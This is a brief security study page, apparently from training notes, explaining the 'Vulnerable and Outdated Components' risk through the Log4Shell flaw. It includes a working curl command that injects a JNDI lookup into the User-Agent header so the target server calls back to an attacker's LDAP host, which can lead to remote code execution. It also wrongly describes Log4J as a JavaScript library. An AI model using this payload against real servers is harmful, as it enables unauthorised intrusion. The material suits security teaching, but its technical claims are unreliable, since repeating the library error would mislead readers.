Vulnerable and Outdated Components

Highlights the dangers of using software libraries, frameworks, or components that contain known vulnerabilities or are outdated. When applications rely on these components, they inherit their security weaknesses which could happen even server-side or client-side.

Here is a typical example of this vulnerability as follows:

  • The Log4Shell vulnerability is one of the most known examples of this. Is a vulnerability from the JavaScript library Log4J which allowed RCE and information disclosure

#For example, a server is running using this component in its code
http://$url:8888/
#If we make a JNDI petition to the web server and redirect it to a JNDI server of our own, the connection will be caught and the web server will process the content of the JNDI server
curl -A \${jndi:ldap://192.168.2.5:1234/a} http://TCMserver:8888/
#This can be leveraged by submitting exploits to the JNDI server which will cause information disclosure and even RCE on the target server

Last updated